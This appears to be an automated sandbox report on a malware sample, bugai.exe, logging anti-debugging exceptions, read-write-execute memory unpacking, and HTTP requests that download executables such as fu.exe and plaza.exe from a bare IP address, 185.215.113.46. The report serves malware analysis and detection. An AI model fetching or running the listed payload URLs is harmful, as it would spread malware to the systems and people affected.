__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 10 2b 2d 12 01 exception.symbol: bugai+0x2da9cf exception.instruction: in eax, dx exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 2992591 exception.address: 0xeca9cf registers.esp: 3341404 registers.edi: 6761879 registers.eax: 1447909480 registers.ebp: 4003897364 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 15490535 registers.ecx: 10	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: cd 01 eb 00 6a 00 53 e8 03 00 00 00 20 5b c3 5b exception.symbol: bugai+0x2de95a exception.instruction: int 1 exception.module: bugai.exe exception.exception_code: 0xc0000005 exception.offset: 3008858 exception.address: 0xece95a registers.esp: 3341372 registers.edi: 0 registers.eax: 3341372 registers.ebp: 4003897364 registers.edx: 0 registers.ebx: 15526650 registers.esi: 746176252 registers.ecx: 264996337	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 f0 04 00 00 81 c7 04 00 00 00 56 e9 33 02 exception.symbol: bugai+0x2df134 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3010868 exception.address: 0xecf134 registers.esp: 3341412 registers.edi: 6761879 registers.eax: 15559817 registers.ebp: 4003897364 registers.edx: 15524978 registers.ebx: 38461218 registers.esi: 6750218 registers.ecx: 6750218	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 52 89 e2 53 bb 04 00 00 00 01 da 8b 1c 24 81 exception.symbol: bugai+0x2df7f9 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3012601 exception.address: 0xecf7f9 registers.esp: 3341412 registers.edi: 6761879 registers.eax: 15559817 registers.ebp: 4003897364 registers.edx: 15524978 registers.ebx: 38461218 registers.esi: 4294938228 registers.ecx: 2283	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 57 54 e9 bb fd ff ff 01 e8 05 a3 f2 b7 7d 52 exception.symbol: bugai+0x2ee144 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3072324 exception.address: 0xede144 registers.esp: 3341408 registers.edi: 13872266 registers.eax: 31668 registers.ebp: 4003897364 registers.edx: 15588749 registers.ebx: 38461440 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 72 00 00 00 59 81 ee 8a 2d fc 76 81 ee bb exception.symbol: bugai+0x2ee34c exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3072844 exception.address: 0xede34c registers.esp: 3341412 registers.edi: 13872266 registers.eax: 322689 registers.ebp: 4003897364 registers.edx: 15592393 registers.ebx: 38461440 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 57 50 b8 a2 c8 72 61 51 b9 84 78 7d 7d bf 82 exception.symbol: bugai+0x2ef5c0 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3077568 exception.address: 0xedf5c0 registers.esp: 3341408 registers.edi: 13872266 registers.eax: 30283 registers.ebp: 4003897364 registers.edx: 15592393 registers.ebx: 15592764 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 6b 9e e7 2d 89 3c 24 56 53 e9 64 00 00 00 exception.symbol: bugai+0x2ef63c exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3077692 exception.address: 0xedf63c registers.esp: 3341412 registers.edi: 13872266 registers.eax: 30283 registers.ebp: 4003897364 registers.edx: 15592393 registers.ebx: 15623047 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 53 e9 36 f8 ff ff 89 34 24 e9 0e fe ff ff 81 exception.symbol: bugai+0x2ef548 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3077448 exception.address: 0xedf548 registers.esp: 3341412 registers.edi: 13872266 registers.eax: 0 registers.ebp: 4003897364 registers.edx: 262633 registers.ebx: 15595499 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 51 89 04 24 54 58 e9 80 fe ff ff f7 d2 e9 bb exception.symbol: bugai+0x2f32f2 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3093234 exception.address: 0xee32f2 registers.esp: 3341404 registers.edi: 13872266 registers.eax: 26784 registers.ebp: 4003897364 registers.edx: 15636323 registers.ebx: 15595499 registers.esi: 0 registers.ecx: 1685937654	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 6e a1 10 41 89 2c 24 c7 04 24 cc 0d 8e 0f exception.symbol: bugai+0x2f386d exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3094637 exception.address: 0xee386d registers.esp: 3341404 registers.edi: 0 registers.eax: 26784 registers.ebp: 4003897364 registers.edx: 15612215 registers.ebx: 15595499 registers.esi: 0 registers.ecx: 222206824	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 51 e9 9e fa ff ff 58 05 f3 f5 cf 75 ff 34 24 exception.symbol: bugai+0x2f67cd exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3106765 exception.address: 0xee67cd registers.esp: 3341400 registers.edi: 0 registers.eax: 15622311 registers.ebp: 4003897364 registers.edx: 777056174 registers.ebx: 15595499 registers.esi: 0 registers.ecx: 222206824	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 56 68 48 9a bf 77 e9 b8 01 00 exception.symbol: bugai+0x2f67bc exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3106748 exception.address: 0xee67bc registers.esp: 3341404 registers.edi: 0 registers.eax: 15653658 registers.ebp: 4003897364 registers.edx: 777056174 registers.ebx: 82608978 registers.esi: 4294939288 registers.ecx: 222206824	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 81 ef e0 88 ff 5f e9 13 05 00 00 56 e9 68 ff exception.symbol: bugai+0x30475e exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3163998 exception.address: 0xef475e registers.esp: 3341400 registers.edi: 15679892 registers.eax: 31810 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 15668614 registers.esi: 15709288 registers.ecx: 15672172	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 6f 18 e6 06 89 04 24 57 c7 04 24 00 a1 3b exception.symbol: bugai+0x30466c exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3163756 exception.address: 0xef466c registers.esp: 3341404 registers.edi: 15711702 registers.eax: 31810 registers.ebp: 4003897364 registers.edx: 3733022304 registers.ebx: 15668614 registers.esi: 15709288 registers.ecx: 4294938648	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 04 04 00 00 c1 eb 06 52 ba d7 05 3d 70 81 exception.symbol: bugai+0x315b2d exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3234605 exception.address: 0xf05b2d registers.esp: 3341372 registers.edi: 620210503 registers.eax: 26305 registers.ebp: 4003897364 registers.edx: 15777779 registers.ebx: 1846854353 registers.esi: 15747025 registers.ecx: 2094661632	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 50 b8 42 f2 ff 39 83 ec 04 89 14 24 53 e9 72 exception.symbol: bugai+0x315d71 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3235185 exception.address: 0xf05d71 registers.esp: 3341372 registers.edi: 620210503 registers.eax: 26305 registers.ebp: 4003897364 registers.edx: 15754307 registers.ebx: 4122562899 registers.esi: 0 registers.ecx: 2094661632	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 bf 04 00 00 46 81 ee cf 19 6f 6e e9 b3 00 exception.symbol: bugai+0x316824 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3237924 exception.address: 0xf06824 registers.esp: 3341372 registers.edi: 620210503 registers.eax: 28268 registers.ebp: 4003897364 registers.edx: 15782925 registers.ebx: 4122562899 registers.esi: 0 registers.ecx: 1161576931	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 2f 55 02 26 89 3c 24 83 ec 04 e9 34 fe ff exception.symbol: bugai+0x3169fc exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3238396 exception.address: 0xf069fc registers.esp: 3341372 registers.edi: 620210503 registers.eax: 28268 registers.ebp: 4003897364 registers.edx: 15782925 registers.ebx: 4122562899 registers.esi: 4294941676 registers.ecx: 1064620984	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 c7 04 24 c7 c0 f7 exception.symbol: bugai+0x317356 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3240790 exception.address: 0xf07356 registers.esp: 3341368 registers.edi: 620210503 registers.eax: 31950 registers.ebp: 4003897364 registers.edx: 15782925 registers.ebx: 15757711 registers.esi: 4294941676 registers.ecx: 1203368932	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 50 e9 ff 01 00 00 89 ce 59 01 f3 8b 34 24 e9 exception.symbol: bugai+0x31729a exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3240602 exception.address: 0xf0729a registers.esp: 3341372 registers.edi: 620210503 registers.eax: 4294937788 registers.ebp: 4003897364 registers.edx: 1426090592 registers.ebx: 15789661 registers.esi: 4294941676 registers.ecx: 1203368932	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 25 be c5 4c ff 34 24 ff 34 24 58 50 89 e0 exception.symbol: bugai+0x31c29e exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3261086 exception.address: 0xf0c29e registers.esp: 3341372 registers.edi: 15762593 registers.eax: 0 registers.ebp: 4003897364 registers.edx: 0 registers.ebx: 44777 registers.esi: 15781058 registers.ecx: 1971716238	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 55 e9 3f 00 00 00 81 c5 04 00 00 00 87 2c 24 exception.symbol: bugai+0x31d0ce exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3264718 exception.address: 0xf0d0ce registers.esp: 3341368 registers.edi: 15762593 registers.eax: 28965 registers.ebp: 4003897364 registers.edx: 15781695 registers.ebx: 91157077 registers.esi: 15781058 registers.ecx: 1971716238	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 56 e9 64 fb ff ff ba da d8 eb 2f e9 93 02 00 exception.symbol: bugai+0x31d5d9 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3266009 exception.address: 0xf0d5d9 registers.esp: 3341372 registers.edi: 24811 registers.eax: 28965 registers.ebp: 4003897364 registers.edx: 15810660 registers.ebx: 4294941196 registers.esi: 15781058 registers.ecx: 1971716238	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 34 24 52 50 68 6c a3 f4 79 58 40 exception.symbol: bugai+0x3201c4 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3277252 exception.address: 0xf101c4 registers.esp: 3341372 registers.edi: 4294938352 registers.eax: 31741 registers.ebp: 4003897364 registers.edx: 79702499 registers.ebx: 4294941197 registers.esi: 81129 registers.ecx: 15825440	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 57 53 bb 30 8a cb 7b 68 41 be c5 71 e9 c0 fb exception.symbol: bugai+0x321c0e exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3283982 exception.address: 0xf11c0e registers.esp: 3341372 registers.edi: 604292947 registers.eax: 29634 registers.ebp: 4003897364 registers.edx: 4294940636 registers.ebx: 15828489 registers.esi: 81129 registers.ecx: 318284059	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 55 56 e9 f5 03 00 00 ba 53 77 3c 7f 29 54 24 exception.symbol: bugai+0x335433 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3363891 exception.address: 0xf25433 registers.esp: 3341372 registers.edi: 15913329 registers.eax: 32154 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 1971716070 registers.esi: 15824082 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 b5 f6 ff ff 50 89 e0 05 04 00 00 00 2d 04 exception.symbol: bugai+0x335d31 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3366193 exception.address: 0xf25d31 registers.esp: 3341372 registers.edi: 15883685 registers.eax: 478762322 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 15824082 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb e9 4a 04 00 00 bd 34 88 dd 57 c1 e5 05 4d 81 exception.symbol: bugai+0x33643d exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3367997 exception.address: 0xf2643d registers.esp: 3341372 registers.edi: 15883685 registers.eax: 30554 registers.ebp: 4003897364 registers.edx: 1408967707 registers.ebx: 15887536 registers.esi: 3860817 registers.ecx: 0	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 55 bd f9 ec ef 5d 01 e8 5d 2d d9 98 10 79 03 exception.symbol: bugai+0x34472e exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3426094 exception.address: 0xf3472e registers.esp: 3341368 registers.edi: 15929024 registers.eax: 15940582 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 15888802 registers.esi: 3916040 registers.ecx: 2094661632	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 31 c9 e9 c4 03 00 00 51 e9 e0 01 00 00 68 e5 exception.symbol: bugai+0x344285 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3424901 exception.address: 0xf34285 registers.esp: 3341372 registers.edi: 15929024 registers.eax: 15972993 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 15888802 registers.esi: 3916040 registers.ecx: 2094661632	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 b5 95 c5 2f 89 34 24 c7 04 24 2b c3 33 3f exception.symbol: bugai+0x343f38 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3424056 exception.address: 0xf33f38 registers.esp: 3341372 registers.edi: 15929024 registers.eax: 15972993 registers.ebp: 4003897364 registers.edx: 2130566132 registers.ebx: 15888802 registers.esi: 607420752 registers.ecx: 4294938208	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 53 54 e9 69 00 00 00 89 34 24 52 68 ac 0a e9 exception.symbol: bugai+0x34f1f2 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3469810 exception.address: 0xf3f1f2 registers.esp: 3341372 registers.edi: 21649 registers.eax: 15987399 registers.ebp: 4003897364 registers.edx: 0 registers.ebx: 803633123 registers.esi: 3813177352 registers.ecx: 2179369302	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 50 e9 00 00 00 00 83 ec 04 89 04 24 c7 04 24 exception.symbol: bugai+0x35a666 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3516006 exception.address: 0xf4a666 registers.esp: 3341372 registers.edi: 21649 registers.eax: 16061076 registers.ebp: 4003897364 registers.edx: 11 registers.ebx: 16000945 registers.esi: 3916040 registers.ecx: 12	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 53 89 04 24 89 e0 05 04 00 00 00 83 e8 04 87 exception.symbol: bugai+0x35a626 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3515942 exception.address: 0xf4a626 registers.esp: 3341372 registers.edi: 0 registers.eax: 16033420 registers.ebp: 4003897364 registers.edx: 604275024 registers.ebx: 16000945 registers.esi: 3916040 registers.ecx: 12	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 c3 42 98 00 89 14 24 89 04 24 53 c7 04 24 exception.symbol: bugai+0x36385d exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3553373 exception.address: 0xf5385d registers.esp: 3341372 registers.edi: 16072741 registers.eax: 26911 registers.ebp: 4003897364 registers.edx: 0 registers.ebx: 605849938 registers.esi: 1995571212 registers.ecx: 2094661632	1
__exception__ Feb. 16, 2024, 7:57 a.m.	stacktrace: exception.instruction_r: fb 68 a3 e2 8b 3f 89 3c 24 e9 1f fc ff ff b8 1b exception.symbol: bugai+0x36fec4 exception.instruction: sti exception.module: bugai.exe exception.exception_code: 0xc0000096 exception.offset: 3604164 exception.address: 0xf5fec4 registers.esp: 3341368 registers.edi: 3998623212 registers.eax: 31926 registers.ebp: 4003897364 registers.edx: 16120288 registers.ebx: 4009228271 registers.esi: 31525871 registers.ecx: 411168458	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/well.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/well.exe

Performs some HTTP requests (20 events)

request	HEAD http://185.215.113.46/cost/fu.exe
request	GET http://185.215.113.46/cost/fu.exe
request	HEAD http://185.215.113.46/cost/niks.exe
request	GET http://185.215.113.46/cost/niks.exe
request	HEAD http://185.215.113.46/mine/plaza.exe
request	GET http://185.215.113.46/mine/plaza.exe
request	HEAD http://185.215.113.46/cost/ladas.exe
request	GET http://185.215.113.46/cost/ladas.exe
request	HEAD http://185.215.113.46/cost/well.exe
request	GET http://185.215.113.46/cost/well.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ATuJsjzcPUtDudBbROHOQ6tT1zfhEou-4TBJ2JnLfFVM5zMyNevnuIkHvddBUcT479PyW_00Wi1o
request	GET https://accounts.google.com/_/bscframe
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ATuJsjzhfDFkb5rx61u0tsHnzrzfCHBuD8tlOuuj6ABBJFfzH8g2ecMn_GKIWDB6sy23s0Vosdg4&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S470561878%3A1708037893123060
request	GET https://accounts.google.com/generate_204?h-1oTQ
request	GET https://www.google.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1975 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 585728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bf1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00570000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00660000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 16, 2024, 7:57 a.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
